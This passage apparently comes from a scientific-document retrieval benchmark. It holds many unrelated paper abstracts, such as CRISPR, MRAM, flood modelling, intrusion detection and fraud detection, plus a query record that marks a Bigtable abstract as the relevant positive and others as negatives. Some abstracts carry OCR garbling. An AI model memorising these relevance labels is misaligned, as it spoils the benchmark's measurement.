"text": "Amlinger, L. 2017. The type I-E CRISPR-Cas system. Biology and applications of an adaptive immune system in bacteria. Digital Comprehensive Summaries of Uppsala Dissertations from the Faculty of Science and Technology 1466. 61 pp. Uppsala: Acta Universitatis Upsaliensis. ISBN 978-91-554-9787-3. CRISPR-Cas systems are adaptive immune systems in bacteria and archaea, consisting of a clustered regularly interspaced short palindromic repeats (CRISPR) array and CRISPR associated (Cas) proteins. In this work, the type I-E CRISPR-Cas system of Escherichia coli was studied. CRISPR-Cas immunity is divided into three stages. In the first stage, adaptation, Cas1 and Cas2 store memory of invaders in the CRISPR array as short intervening sequences, called spacers. During the expression stage, the array is transcribed, and subsequently processed into small CRISPR RNAs (crRNA), each consisting of one spacer and one repeat. The crRNAs are bound by the Cascade multi-protein complex. During the interference step, Cascade searches for DNA molecules complementary to the crRNA spacer. When a match is found, the target DNA is degraded by the recruited Cas3 nuclease. Host factors required for integration of new spacers into the CRISPR array were first investigated. Deleting recD, involved in DNA repair, abolished memory formation by reducing the concentration of the Cas1-Cas2 expression plasmid, leading to decreased amounts of Cas1 to levels likely insufficient for spacer integration. Deletion of RecD has an indirect effect on adaptation. To facilitate detection of adaptation, a sensitive fluorescent reporter was developed where an out-of-frame yfp reporter gene is moved into frame when a new spacer is integrated, enabling fluorescent detection of adaptation. Integration can be detected in single cells by a variety of fluorescence-based methods. A second aspect of this thesis aimed at investigating spacer elements affecting target interference. Spacers with predicted secondary structures in the crRNA impaired the ability of the CRISPR-Cas system to prevent transformation of targeted plasmids. Lastly, in absence of Cas3, Cascade was successfully used to inhibit transcription of specific genes by preventing RNA polymerase access to the promoter. The CRISPR-Cas field has seen rapid development since the first demonstration of immunity almost ten years ago. However, much research remains to fully understand these interesting adaptive immune systems and the research presented here increases our understanding of the type I-E CRISPR-Cas system.",
"title": ""
},
{
"docid": "71215e59838861228f316da921b7f6b7",
"text": "In this paper, we present two multilevel spin-orbit torque magnetic random access memories (SOT-MRAMs). A single-level SOT-MRAM employs a three-terminal SOT device as a storage element with enhanced endurance, close-to-zero read disturbance, and low write energy. However, the three-terminal device requires the use of two access transistors per cell. To improve the integration density, we propose two multilevel cells (MLCs): 1) series SOT MLC and 2) parallel SOT MLC, both of which store two bits per memory cell. A detailed analysis of the bit-cell suggests that the S-MLC is promising for applications requiring both high density and low write-error rate, and P-MLC is particularly suitable for high-density and low-write-energy applications. We also performed iso-bit-cell area comparison of our MLC designs with previously proposed MLCs that are based on spin-transfer torque MRAM and show 3-16× improvement in write energy.",
"title": ""
},
{
"docid": "8e2242a14c1d671b2c6fd068759c7944",
"text": "Part I of this two-part paper provided an overview of the HAZUS-MH Flood Model and a discussion of its capabilities for characterizing riverine and coastal flooding. Included was a discussion of the Flood Information Tool, which permits rapid analysis of a wide variety of stream discharge data and topographic mapping to determine flood-frequencies over entire floodplains. This paper reports on the damage and loss estimation capability of the Flood Model, which includes a library of more than 900 damage curves for use in estimating damage to various types of buildings and infrastructure. Based on estimated property damage, the model estimates shelter needs and direct and indirect economic losses arising from floods. Analyses for the effects of flood warning, the benefits of levees, structural elevation, and flood mapping restudies are also facilitated with the Flood Model. DOI: 10.1061/ ASCE 1527-6988 2006 7:2 72 CE Database subject headings: Floods; Damage; Estimation; Models; Mapping.",
"title": ""
},
{
"docid": "d16ec1f4c32267a07b1453d45bc8a6f2",
"text": "Knowledge representation learning (KRL), exploited by various applications such as question answering and information retrieval, aims to embed the entities and relations contained by the knowledge graph into points of a vector space such that the semantic and structure information of the graph is well preserved in the representing space. However, the previous works mainly learned the embedding representations by treating each entity and relation equally which tends to ignore the inherent imbalance and heterogeneous properties existing in knowledge graph. By visualizing the representation results obtained from classic algorithm TransE in detail, we reveal the disadvantages caused by this homogeneous learning strategy and gain insight of designing policy for the homogeneous representation learning. In this paper, we propose a novel margin-based pairwise representation learning framework to be incorporated into many KRL approaches, with the method of introducing adaptivity according to the degree of knowledge heterogeneity. More specially, an adaptive margin appropriate to separate the real samples from fake samples in the embedding space is first proposed based on the sample’s distribution density, and then an adaptive weight is suggested to explicitly address the trade-off between the different contributions coming from the real and fake samples respectively. The experiments show that our Adaptive Weighted Margin Learning (AWML) framework can help the previous work achieve a better performance on real-world Knowledge Graphs Freebase and WordNet in the tasks of both link prediction and triplet classification.",
"title": ""
},
{
"docid": "dd57aeca3efe7bba99f141b4536b1a9c",
"text": "The dislocation stress memorization technique (D-SMT) stressor is demonstrated to boost the device performance on the Si three-dimensional (3-D) FinFET device. The larger channel stress and mobility enhancement ratio are observed in the narrower gate width device, due to the effect of triple crystal re-growth directions on the 3-D FinFET device. In this paper, ~33% mobility enhancement and ~23% Id,sat improvement on the Si FinFET device with W/L of 100/60 nm are achieved successfully with the implement of D-SMT stressor.",
"title": ""
},
{
"docid": "2710a25b3cf3caf5ebd5fb9f08c9e5e3",
"text": "Your use of the JSTOR archive indicates your acceptance of JSTOR's Terms and Conditions of Use, available at http://www.jstor.org/page/info/about/policies/terms.jsp. JSTOR's Terms and Conditions of Use provides, in part, that unless you have obtained prior permission, you may not download an entire issue of a journal or multiple copies of articles, and you may use content in the JSTOR archive only for your personal, non-commercial use.",
"title": ""
},
{
"docid": "a5e01cfeb798d091dd3f2af1a738885b",
"text": "It is shown by an extensive benchmark on molecular energy data that the mathematical form of the damping function in DFT-D methods has only a minor impact on the quality of the results. For 12 different functionals, a standard \"zero-damping\" formula and rational damping to finite values for small interatomic distances according to Becke and Johnson (BJ-damping) has been tested. The same (DFT-D3) scheme for the computation of the dispersion coefficients is used. The BJ-damping requires one fit parameter more for each functional (three instead of two) but has the advantage of avoiding repulsive interatomic forces at shorter distances. With BJ-damping better results for nonbonded distances and more clear effects of intramolecular dispersion in four representative molecular structures are found. For the noncovalently-bonded structures in the S22 set, both schemes lead to very similar intermolecular distances. For noncovalent interaction energies BJ-damping performs slightly better but both variants can be recommended in general. The exception to this is Hartree-Fock that can be recommended only in the BJ-variant and which is then close to the accuracy of corrected GGAs for non-covalent interactions. According to the thermodynamic benchmarks BJ-damping is more accurate especially for medium-range electron correlation problems and only small and practically insignificant double-counting effects are observed. It seems to provide a physically correct short-range behavior of correlation/dispersion even with unmodified standard functionals. In any case, the differences between the two methods are much smaller than the overall dispersion effect and often also smaller than the influence of the underlying density functional.",
"title": ""
},
{
"docid": "92ca87957f5b97d2b249bc73e9d9a48d",
"text": "Methods for text simplification using the framework of statistical machine translation have been extensively studied in recent years. However, building the monolingual parallel corpus necessary for training the model requires costly human annotation. Monolingual parallel corpora for text simplification have therefore been built only for a limited number of languages, such as English and Portuguese. To obviate the need for human annotation, we propose an unsupervised method that automatically builds the monolingual parallel corpus for text simplification using sentence similarity based on word embeddings. For any sentence pair comprising a complex sentence and its simple counterpart, we employ a many-to-one method of aligning each word in the complex sentence with the most similar word in the simple sentence and compute sentence similarity by averaging these word similarities. The experimental results demonstrate the excellent performance of the proposed method in a monolingual parallel corpus construction task for English text simplification. The results also demonstrated the superior accuracy in text simplification that use the framework of statistical machine translation trained using the corpus built by the proposed method to that using the existing corpora.",
"title": ""
},
{
"docid": "2a15dfdf9c9a225ef1328e72100f8035",
"text": "We present an efficient numerical strategy for the Bayesian solution of inverse problems. Stochastic collocation methods, based on generalized polynomial chaos (gPC), are used to construct a polynomial approximation of the forward solution over the support of the prior distribution. This approximation then defines a surrogate posterior probability density that can be evaluated repeatedly at minimal computational cost. The ability to simulate a large number of samples from the posterior distribution results in very accurate estimates of the inverse solution and its associated uncertainty. Combined with high accuracy of the gPC-based forward solver, the new algorithm can provide great efficiency in practical applications. A rigorous error analysis of the algorithm is conducted, where we establish convergence of the approximate posterior to the true posterior and obtain an estimate of the convergence rate. It is proved that fast (exponential) convergence of the gPC forward solution yields similarly fast (exponential) convergence of the posterior. The numerical strategy and the predicted convergence rates are then demonstrated on nonlinear inverse problems of varying smoothness and dimension. AMS subject classifications: 41A10, 60H35, 65C30, 65C50",
"title": ""
},
{
"docid": "a383d9b392a58f6ba8a7192104e99600",
"text": "In this correspondence, we present a new universal entropy estimator for stationary ergodic sources, prove almost sure convergence, and establish an upper bound on the convergence rate for finite-alphabet finite memory sources. The algorithm is motivated by data compression using the Burrows-Wheeler block sorting transform (BWT). By exploiting the property that the BWT output sequence is close to a piecewise stationary memoryless source, we can segment the output sequence and estimate probabilities in each segment. Experimental results show that our algorithm outperforms Lempel-Ziv (LZ) string-matching-based algorithms.",
"title": ""
},
{
"docid": "7808ed17e6e7fa189e6b33922573af56",
"text": "The communication needs of Earth observation satellites is steadily increasing. Within a few years, the data rate of such satellites will exceed 1 Gbps, the angular resolution of sensors will be less than 1 μrad, and the memory size of onboard data recorders will be beyond 1 Tbytes. Compared to radio frequency links, optical communications in space offer various advantages such as smaller and lighter equipment, higher data rates, limited risk of interference with other communications systems, and the effective use of frequency resources. This paper describes and compares the major features of radio and optical frequency communications systems in space and predicts the needs of future satellite communications.",
"title": ""
},
{
"docid": "e03b0d954f52e6880a7b37bc346ae471",
"text": "1 I n t r o d u c t i o n Many induction algorithms construct models with unnecessary structure. These models contain components tha t do not improve accuracy, and tha t only reflect random variation in a single da ta sample. Such models are less efficient to store and use than their correctly-sized counterparts . Using these models requires the collection of unnecessary data. Portions of these models are wrong and mislead users. Finally, excess s tructure can reduce the accuracy of induced models on new data [8]. For induction algorithms tha t build decision trees [1, 7, 10], pruning is a common approach to remove excess structure. Pruning methods take an induced tree, examine individual subtrees, and remove those subtrees deemed unnecessary. Pruning methods differ primarily in the criterion used to judge subtrees. Many criteria have been proposed, including statistical significance tests [10], corrected error est imates [7], and minimum description length calculations [9]. In this paper, we bring together three threads of our research on excess structure and decision tree pruning. First, we show that several common methods for pruning decision trees still retain excess structure. Second, we explain this phenomenon in terms of statistical decision making with incorrect reference distributions. Third, we present a method tha t adjusts for incorrect reference distributions, and we present an experiment that evaluates the method. Our analysis indicates that many existing techniques for building decision trees fail to consider the statistical implications of examining many possible subtrees. We show how a simple adjustment can allow such systems to make valid statistical inferences in this specific situation. X. Liu, P. Cohen, M. Berthold (Eds.): \"Advances in Intelligent Data Analysis\" (IDA-97) LNCS 1280, pp. 211-222, 1997. 9 Springer-Verlag Berlin Heidelberg 1997 212 JENSEN, GATES, AND COHEN 2 O b s e r v i n g E x c e s s S t r u c t u r e Consider Figure 1, which shows a typical plot of tree size and accuracy as a function of training set size for the UCI a u s t r a l i a n dataset. 1 Moving from leftto-right in the graph corresponds to increasing the number of training instances available to the tree building process. On the left-hand side, no training instances are available and the best one can do with test instances is to assign them a class label at random. On the right-hand side, the entire dataset (excluding test instances) is available to the tree building process. C4.5 [7] and error-based pruning (the c4.5 default) are used to build and prune trees, respectively. Note that accuracy on this dataset stops increasing at a rather small training set size, thereafter remaining essentially constant. 2 Surprisingly, tree size continues to grow nearly linearly despite the use of error-based pruning. The graph clearly shows that unnecessary structure is retained, and more is retained as the size of the training set increases. Accuracy stops increasing after only 25% of the available training instances are seen. The tree at tha t point contains 22 nodes. When 100% of the available training instances are used in tree construction, the resulting tree contains 64 nodes. Despite a 3-fold increase in size over the tree built with 25% of the data, the accuracies of the two trees are statistically indistinguishable. Under a broad range of circumstances, there is a nearly linear relationship between training set size and tree size, even after accuracy has ceased to increase. 
The relationship between training set size and tree size was explored with 4 pruning methods and 19 datasets taken from the UCI repository. 3 The pruning methods are error-based (EBB the C4.5 default) [7], reduced error (REP) [8], minimum description length (MDL) [9], and cost-complexity with the lsE rule (ccP) [1]. The majority of extant pruning methods take one of four general approaches: deflating accuracy estimates based on the training set (e.g. EBP); pruning based on accuracy estimates from a pruning set (e.g. aEP); managing the tradeoff between accuracy and complexity (e.g. MDL); and creating a set of pruned trees based on different values of a pruning parameter and then selecting the appropriate parameter value using a pruning set or cross-validation (e.g. ccP). The pruning methods used in this paper were selected to be representative of these four approaches. Plots of tree size and accuracy as a function of training set size were generated for each combination of dataset and pruning algorithm as follows. Typically, 1 All datasets in this paper can be obtained from the University of California-Irvine (UCI) Machine Learning Repository. http ://ww~. its. uci. edu/ mlearn/MLRepository, html. 2 All reported accuracy figures in this paper are based on separate test sets, distinct from any data used for training. 3 The datasets are the same ones used in [4] with two exceptions. The crx dataset was omitted because it is roughly the same as the aus t r a l i aa dataset, and the horse-co l ic dataset was omitted because it was unclear which attribute was used as the class label. Note that the votel dataset was created by removing the physician-fee-freeze attribute from the vote dataset. BUILDING SIMPLE MODELS: A CASE STUDY WITH DECISION TREES 213",
"title": ""
},
{
"docid": "db7ed2c615bb93c6cec19b65f7b4366d",
"text": "Virtual anthropology consists of the introduction of modern slice imaging to biological and forensic anthropology. Thanks to this non-invasive scientific revolution, some classifications and staging systems, first based on dry bone analysis, can be applied to cadavers with no need for specific preparation, as well as to living persons. Estimation of bone and dental age is one of the possibilities offered by radiology. Biological age can be estimated in clinical forensic medicine as well as in living persons. Virtual anthropology may also help the forensic pathologist to estimate a deceased person’s age at death, which together with sex, geographical origin and stature, is one of the important features determining a biological profile used in reconstructive identification. For this forensic purpose, the radiological tools used are multislice computed tomography and, more recently, X-ray free imaging techniques such as magnetic resonance imaging and ultrasound investigations. We present and discuss the value of these investigations for age estimation in anthropology.",
"title": ""
},
{
"docid": "6c7261b5dec9c61d34d78056bce74d47",
"text": "The matching of tractor-implement system is very difficult task in India because variety of tractor models ranging from 10 to 45kW is prevalent here. To overcome the problem of matching tractor-implement system, a decision support system (DSS) was developed in Visual Basic 6.0 programming language for 2-wheel drive (2WD) tractors. The DSS provides intuitive user interfaces by linking databases such as tractor parameters, tire and implement specifications, soil and operating conditions to support the decision for selection of tractor-implement system. DSS was validated for three different implements (2×30cm moldboard plow; 9-23cm field cultivator and 7-7 offset disc harrow (1.6m)). DSS which calculates draft, drawbar power, slip, tractive efficiency, coefficient of rolling resistance, coefficient of net traction, PTO power required, power utilization efficiency, specific fuel consumption based etc. on input data, can be used effectively in matching of tractor-implement system of various makes and models commercially available in India.",
"title": ""
},
{
"docid": "7b05751aa3257263e7f1a8a6f1e2ff7e",
"text": "Intrusion Detection System (IDS) that turns to be a vital component to secure the network. The lack of regular updation, less capability to detect unknown attacks, high non adaptable false alarm rate, more consumption of network resources etc., makes IDS to compromise. This paper aims to classify the NSL-KDD dataset with respect to their metric data by using the best six data mining classification algorithms like J48, ID3, CART, Bayes Net, Naïve Bayes and SVM to find which algorithm will be able to offer more testing accuracy. NSL-KDD dataset has solved some of the inherent limitations of the available KDD’99 dataset. KeywordsIDS, KDD, Classification Algorithms, PCA etc.",
"title": ""
},
{
"docid": "6c3f320eda59626bedb2aad4e527c196",
"text": "Though research on the Semantic Web has progressed at a steady pace, its promise has yet to be realized. One major difficulty is that, by its very nature, the Semantic Web is a large, uncensored system to which anyone may contribute. This raises the question of how much credence to give each source. We cannot expect each user to know the trustworthiness of each source, nor would we want to assign top-down or global credibility values due to the subjective nature of trust. We tackle this problem by employing a web of trust, in which each user provides personal trust values for a small number of other users. We compose these trusts to compute the trust a user should place in any other user in the network. A user is not assigned a single trust rank. Instead, different users may have different trust values for the same user. We define properties for combination functions which merge such trusts, and define a class of functions for which merging may be done locally while maintaining these properties. We give examples of specific functions and apply them to data from Epinions and our BibServ bibliography server. Experiments confirm that the methods are robust to noise, and do not put unreasonable expectations on users. We hope that these methods will help move the Semantic Web closer to fulfilling its promise.",
"title": ""
},
{
"docid": "973249fc3e4ec5cd9c90d933f786a1c6",
"text": "www.PosterPresentations.com RNN can model the entire sequence and capture long-term dependencies, but it does not do well in extracting key patterns. In contrast, convolutional neural network (CNN) is good at Extracting local and position-invariant features. We present a novel model named disconnected recurrent neural network (DRNN), which incorporates position-invariance into RNN by constraining the distance of information flow in RNN. DRNN achieves the best performance on several benchmark datasets for text categorization. INTRODUCTION",
"title": ""
}
] | scidocsrr |
c11af3663a2c5912bbc9ec57741b2880 | The Web at Graduation and Beyond | [
{
"docid": "7add673c4f72e6a7586109ac3bdab2ec",
"text": "Bigtable is a distributed storage system for managing structured data that is designed to scale to a very large size: petabytes of data across thousands of commodity servers. Many projects at Google store data in Bigtable, including web indexing, Google Earth, and Google Finance. These applications place very different demands on Bigtable, both in terms of data size (from URLs to web pages to satellite imagery) and latency requirements (from backend bulk processing to real-time data serving). Despite these varied demands, Bigtable has successfully provided a flexible, high-performance solution for all of these Google products. In this article, we describe the simple data model provided by Bigtable, which gives clients dynamic control over data layout and format, and we describe the design and implementation of Bigtable.",
"title": ""
}
] | [
{
"docid": "057069a06621b879f88c6d09f8867f77",
"text": "Nowadays, the railway industry is in a position where it is able to exploit the opportunities created by the IIoT (Industrial Internet of Things) and enabling communication technologies under the paradigm of Internet of Trains. This review details the evolution of communication technologies since the deployment of GSM-R, describing the main alternatives and how railway requirements, specifications and recommendations have evolved over time. The advantages of the latest generation of broadband communication systems (e.g., LTE, 5G, IEEE 802.11ad) and the emergence of Wireless Sensor Networks (WSNs) for the railway environment are also explained together with the strategic roadmap to ensure a smooth migration from GSM-R. Furthermore, this survey focuses on providing a holistic approach, identifying scenarios and architectures where railways could leverage better commercial IIoT capabilities. After reviewing the main industrial developments, short and medium-term IIoT-enabled services for smart railways are evaluated. Then, it is analyzed the latest research on predictive maintenance, smart infrastructure, advanced monitoring of assets, video surveillance systems, railway operations, Passenger and Freight Information Systems (PIS/FIS), train control systems, safety assurance, signaling systems, cyber security and energy efficiency. Overall, it can be stated that the aim of this article is to provide a detailed examination of the state-of-the-art of different technologies and services that will revolutionize the railway industry and will allow for confronting today challenges.",
"title": ""
},
{
"docid": "a05b50b3b5bf6504a9e35dbadac9764b",
"text": "UNLABELLED\n\n\n\nBACKGROUND\nThe Avogadro project has developed an advanced molecule editor and visualizer designed for cross-platform use in computational chemistry, molecular modeling, bioinformatics, materials science, and related areas. It offers flexible, high quality rendering, and a powerful plugin architecture. Typical uses include building molecular structures, formatting input files, and analyzing output of a wide variety of computational chemistry packages. By using the CML file format as its native document type, Avogadro seeks to enhance the semantic accessibility of chemical data types.\n\n\nRESULTS\nThe work presented here details the Avogadro library, which is a framework providing a code library and application programming interface (API) with three-dimensional visualization capabilities; and has direct applications to research and education in the fields of chemistry, physics, materials science, and biology. The Avogadro application provides a rich graphical interface using dynamically loaded plugins through the library itself. The application and library can each be extended by implementing a plugin module in C++ or Python to explore different visualization techniques, build/manipulate molecular structures, and interact with other programs. We describe some example extensions, one which uses a genetic algorithm to find stable crystal structures, and one which interfaces with the PackMol program to create packed, solvated structures for molecular dynamics simulations. The 1.0 release series of Avogadro is the main focus of the results discussed here.\n\n\nCONCLUSIONS\nAvogadro offers a semantic chemical builder and platform for visualization and analysis. For users, it offers an easy-to-use builder, integrated support for downloading from common databases such as PubChem and the Protein Data Bank, extracting chemical data from a wide variety of formats, including computational chemistry output, and native, semantic support for the CML file format. For developers, it can be easily extended via a powerful plugin mechanism to support new features in organic chemistry, inorganic complexes, drug design, materials, biomolecules, and simulations. Avogadro is freely available under an open-source license from http://avogadro.openmolecules.net.",
"title": ""
},
{
"docid": "7dcd4a4e687975b6b774487303fc1a40",
"text": "Analysis of kinship from facial images or videos is an important problem. Prior machine learning and computer vision studies approach kinship analysis as a verification or recognition task. In this paper, first time in the literature, we propose a kinship synthesis framework, which generates smile videos of (probable) children from the smile videos of parents. While the appearance of a child’s smile is learned using a convolutional encoder-decoder network, another neural network models the dynamics of the corresponding smile. The smile video of the estimated child is synthesized by the combined use of appearance and dynamics models. In order to validate our results, we perform kinship verification experiments using videos of real parents and estimated children generated by our framework. The results show that generated videos of children achieve higher correct verification rates than those of real children. Our results also indicate that the use of generated videos together with the real ones in the training of kinship verification models, increases the accuracy, suggesting that such videos can be used as a synthetic dataset.",
"title": ""
},
{
"docid": "3e012db58ce7b25866a7c95b90b1aace",
"text": "The goal of graph representation learning is to embed each vertex in a graph into a low-dimensional vector space. Existing graph representation learning methods can be classified into two categories: generative models that learn the underlying connectivity distribution in the graph, and discriminative models that predict the probability of edge existence between a pair of vertices. In this paper, we propose GraphGAN, an innovative graph representation learning framework unifying above two classes of methods, in which the generative model and discriminative model play a game-theoretical minimax game. Specifically, for a given vertex, the generative model tries to fit its underlying true connectivity distribution over all other vertices and produces “fake” samples to fool the discriminative model, while the discriminative model tries to detect whether the sampled vertex is from ground truth or generated by the generative model. With the competition between these two models, both of them can alternately and iteratively boost their performance. Moreover, when considering the implementation of generative model, we propose a novel graph softmax to overcome the limitations of traditional softmax function, which can be proven satisfying desirable properties of normalization, graph structure awareness, and computational efficiency. Through extensive experiments on real-world datasets, we demonstrate that GraphGAN achieves substantial gains in a variety of applications, including link prediction, node classification, and recommendation, over state-of-the-art baselines.",
"title": ""
},
{
"docid": "be43b90cce9638b0af1c3143b6d65221",
"text": "Reasoning on provenance information and property propagation is of significant importance in e-science since it helps scientists manage derived metadata in order to understand the source of an object, reproduce results of processes and facilitate quality control of results and processes. In this paper we introduce a simple, yet powerful reasoning mechanism based on property propagation along the transitive part-of and derivation chains, in order to trace the provenance of an object and to carry useful inferences. We apply our reasoning in semantic repositories using the CIDOC-CRM conceptual schema and its extension CRMdig, which has been develop for representing the digital and empirical provenance of digi-",
"title": ""
},
{
"docid": "9086291516a6a45cdb9c68ab3695f231",
"text": "The study is to investigate resellers’ point of view about the impact of brand awareness, perceived quality and customer loyalty on brand profitability and purchase intention. Further the study is also focused on finding out the mediating role of purchase intension on the relationship of brand awareness and profitability, perceived quality and profitability and brand loyalty and profitability. The study was causal in nature and data was collected from 200 resellers. The results showed insignificant impact of brand awareness and loyalty whereas significant impact of perceived quality on profitability. Further the results revealed significant impact of brand awareness, perceived quality and loyalty on purchase intention. Sobel test for mediation showed that purchase intension mediates the relationship of the perceived quality and profitability only.",
"title": ""
},
{
"docid": "96590c575412d33e09fee7ea52ae9a60",
"text": "Performance of microphone arrays at the high-frequency range is typically limited by aliasing, which is a result of the spatial sampling process. This paper presents analysis of aliasing for spherical microphone arrays, which have been recently studied for a range of applications. The paper presents theoretical analysis of spatial aliasing for various sphere sampling configurations, showing how high-order spherical harmonic coefficients are aliased into the lower orders. Spatial antialiasing filters on the sphere are then introduced, and the performance of spatially constrained filters is compared to that of the ideal antialiasing filter. A simulation example shows how the effect of aliasing on the beam pattern can be reduced by the use of the antialiasing filters",
"title": ""
},
{
"docid": "717d1c31ac6766fcebb4ee04ca8aa40f",
"text": "We present an incremental maintenance algorithm for leapfrog triejoin. The algorithm maintains rules in time proportional (modulo log factors) to the edit distance between leapfrog triejoin traces.",
"title": ""
},
{
"docid": "dbeb76c985630a733c3d1956119e88e2",
"text": "Electromagnetic signals of low frequency have been shown to be durably produced in aqueous dilutions of the Human Imunodeficiency Virus DNA. In vivo, HIV DNA signals are detected only in patients previously treated by antiretroviral therapy and having no detectable viral RNA copies in their blood. We suggest that the treatment of AIDS patients pushes the virus towards a new mode of replication implying only DNA, thus forming a reservoir insensitive to retroviral inhibitors. Implications for new approaches aimed at eradicating HIV infection are discussed.",
"title": ""
},
{
"docid": "ff041b2c0356560305a9882457b42fd6",
"text": "The present study investigated the relationship between delusion proneness, as assessed using the Peters et al. Delusions Inventory [Peters, E.R., Joseph, S.A., Garety, P.A., 1999. The measurement of delusional ideation in the normal population: Introducing the PDI (Peters et al. Delusions Inventory). Schizophr. Bull. 25 553-576], and cognitive insight, as assessed using the Beck Cognitive Insight Scale (BCIS; [Beck, A.T., Baruch, E., Balter, J.M., Steer, R.A., Warman, D.M., 2004. A new instrument for measuring insight: The Beck Cognitive Insight Scale. Schizophr. Res. 68, 319-329]. Two hundred undergraduate students with no history of psychotic disorder participated. Results indicated that, consistent with hypotheses, those higher in delusion proneness endorsed more certainty in their beliefs and judgment than those who were lower in delusion proneness (Self-Certainty subscale of the BCIS; p = .007). Contrary to hypotheses, however, those who were higher in delusion proneness were more open to external feedback and were more willing to acknowledge fallibility than those who were lower in delusion proneness (Self-Reflectiveness subscale of the BCIS; p = .002). The results are discussed in relation to theories of delusion formation.",
"title": ""
},
{
"docid": "385e50da85d4d6b4ec2cdc2ed7309ce8",
"text": "This paper presents a novel reconfigurable framework for training Convolutional Neural Networks (CNNs). The proposed framework is based on reconfiguring a streaming datapath at runtime to cover the training cycle for the various layers in a CNN. The streaming datapath can support various parameterized modules which can be customized to produce implementations with different trade-offs in performance and resource usage. The modules follow the same input and output data layout, simplifying configuration scheduling. For different layers, instances of the modules contain different computation kernels in parallel, which can be customized with different layer configurations and data precision. The associated models on performance, resource and bandwidth can be used in deriving parameters for the datapath to guide the analysis of design trade-offs to meet application requirements or platform constraints. They enable estimation of the implementation specifications given different layer configurations, to maximize performance under the constraints on bandwidth and hardware resources. Experimental results indicate that the proposed module design targeting Maxeler technology can achieve a performance of 62.06 GFLOPS for 32-bit floating-point arithmetic, outperforming existing accelerators. Further evaluation based on training LeNet-5 shows that the proposed framework achieves about 4 times faster than CPU implementation of Caffe and about 7.5 times more energy efficient than the GPU implementation of Caffe.",
"title": ""
},
{
"docid": "68058500fd6dbbc60104a0985fecd4a8",
"text": "Instagram, a popular global mobile photo-sharing platform, involves various user interactions centered on posting images accompanied by hashtags. Participatory hashtagging, one of these diverse tagging practices, has great potential to be a communication channel for various organizations and corporations that would like to interact with users on social media. In this paper, we aim to characterize participatory hashtagging behaviors on Instagram by conducting a case study of its representative hashtagging practice, the Weekend Hashtag Project, or #WHP. By conducting a user study using both quantitative and qualitative methods, we analyzed the way Instagram users respond to participation calls and identified factors that motivate users to take part in the project. Based on these findings, we provide design strategies for any interested parties to interact with users on social media.",
"title": ""
},
{
"docid": "7e43c21444af5fdb4e8ff6890742a44b",
"text": "Cellulases are the enzymes hydrolyzing cellulosic biomass and are produced by the microorganisms that grown over cellulosic matters. Bacterial cellulases possess more advantages when compared to the cellulases from other sources. Cellulase producing bacteria was isolated from Cow dung. The organism was identified using 16 SrDNA sequencing and BLAST search. Cellulase was produced and the culture conditions like temperature, pH, and Incubation time and medium components like Carbon sources, nitrogen sources and role of natural substrates were optimized. The enzyme was further purified using ethanol precipitation and chromatography. Cellulase was then characterized using SDS-PAGE analysis and Zymographic Studies. The application of Cellulase in Biostoning was then analyzed.",
"title": ""
},
{
"docid": "ec4deb4db5f596bde9c4adaeb814ce28",
"text": "Traditional methods for motion estimation estimate the motion field F between a pair of images as the one that minimizes a predesigned cost function. In this paper, we propose a direct method and train a Convolutional Neural Network (CNN) that when, at test time, is given a pair of images as input it produces a dense motion field F at its output layer. In the absence of large datasets with ground truth motion that would allow classical supervised training, we propose to train the network in an unsupervised manner. The proposed cost function that is optimized during training, is based on the classical optical flow constraint. The latter is differentiable with respect to the motion field and, therefore, allows backpropagation of the error to previous layers of the network. Our method is tested on both synthetic and real image sequences and performs similarly to the state-of-the-art methods.",
"title": ""
},
{
"docid": "dc610cdd3c6cc5ae443cf769bd139e78",
"text": "With modern smart phones and powerful mobile devices, Mobile apps provide many advantages to the community but it has also grown the demand for online availability and accessibility. Cloud computing is provided to be widely adopted for several applications in mobile devices. However, there are many advantages and disadvantages of using mobile applications and cloud computing. This paper focuses in providing an overview of mobile cloud computing advantages, disadvantages. The paper discusses the importance of mobile cloud applications and highlights the mobile cloud computing open challenges",
"title": ""
},
{
"docid": "66b088871549d5ec924dbe500522d6f8",
"text": "Being able to effectively measure similarity between patents in a complex patent citation network is a crucial task in understanding patent relatedness. In the past, techniques such as text mining and keyword analysis have been applied for patent similarity calculation. The drawback of these approaches is that they depend on word choice and writing style of authors. Most existing graph-based approaches use common neighbor-based measures, which only consider direct adjacency. In this work we propose new similarity measures for patents in a patent citation network using only the patent citation network structure. The proposed similarity measures leverage direct and indirect co-citation links between patents. A challenge is when some patents receive a large number of citations, thus are considered more similar to many other patents in the patent citation network. To overcome this challenge, we propose a normalization technique to account for the case where some pairs are ranked very similar to each other because they both are cited by many other patents. We validate our proposed similarity measures using US class codes for US patents and the well-known Jaccard similarity index. Experiments show that the proposed methods perform well when compared to the Jaccard similarity index.",
"title": ""
},
{
"docid": "e404699c5b86d3a3a47a1f3d745eecc1",
"text": "We apply Artificial Immune Systems(AIS) [4] for credit card fraud detection and we compare it to other methods such as Neural Nets(NN) [8] and Bayesian Nets(BN) [2], Naive Bayes(NB) and Decision Trees(DT) [13]. Exhaustive search and Genetic Algorithm(GA) [7] are used to select optimized parameters sets, which minimizes the fraud cost for a credit card database provided by a Brazilian card issuer. The specifics of the fraud database are taken into account, such as skewness of data and different costs associated with false positives and negatives. Tests are done with holdout sample sets, and all executions are run using Weka [18], a publicly available software. Our results are consistent with the early result of Maes in [12] which concludes that BN is better than NN, and this occurred in all our evaluated tests. Although NN is widely used in the market today, the evaluated implementation of NN is among the worse methods for our database. In spite of a poor behavior if used with the default parameters set, AIS has the best performance when parameters optimized by GA are used.",
"title": ""
},
{
"docid": "a4cddba12bf99030fa02d986a453ad84",
"text": "QDT 2012 To obtain consistent esthetic outcomes, the design of dental restorations should be defined as soon as possible. The importance of gathering diagnostic data from questionnaires and checklists1–7 cannot be overlooked; however, much of this information may be lost if it is not transferred adequately to the design of the restorations. The diagnostic data must guide the subsequent treatment phases,8 integrating all of the patient’s needs, desires, and functional and biologic issues into an esthetic treatment design.9,10 The Digital Smile Design (DSD) is a multi-use conceptual tool that can strengthen diagnostic vision, improve communication, and enhance predictability throughout treatment. The DSD allows for careful analysis of the patient’s facial and dental characteristics along with any critical factors that may have been overlooked during clinical, photographic, or diagnostic cast–based evaluation procedures. The drawing of reference lines and shapes over extraand intraoral digital photographs in a predetermined sequence can widen diagnostic visualization and help the restorative team evaluate the limitations and risk factors of a given case, including asymmetries, disharmonies, and violations of esthetic principles.1 DSD sketches can be performed in presentation software such as Keynote (iWork, Apple, Cupertino, California, USA) or Microsoft PowerPoint (Microsoft Office, Microsoft, Redmond, Washington, USA). This improved visualization makes it easier to select the ideal restorative technique. The DSD protocol is characterized by effective communication between the interdisciplinary dental team, 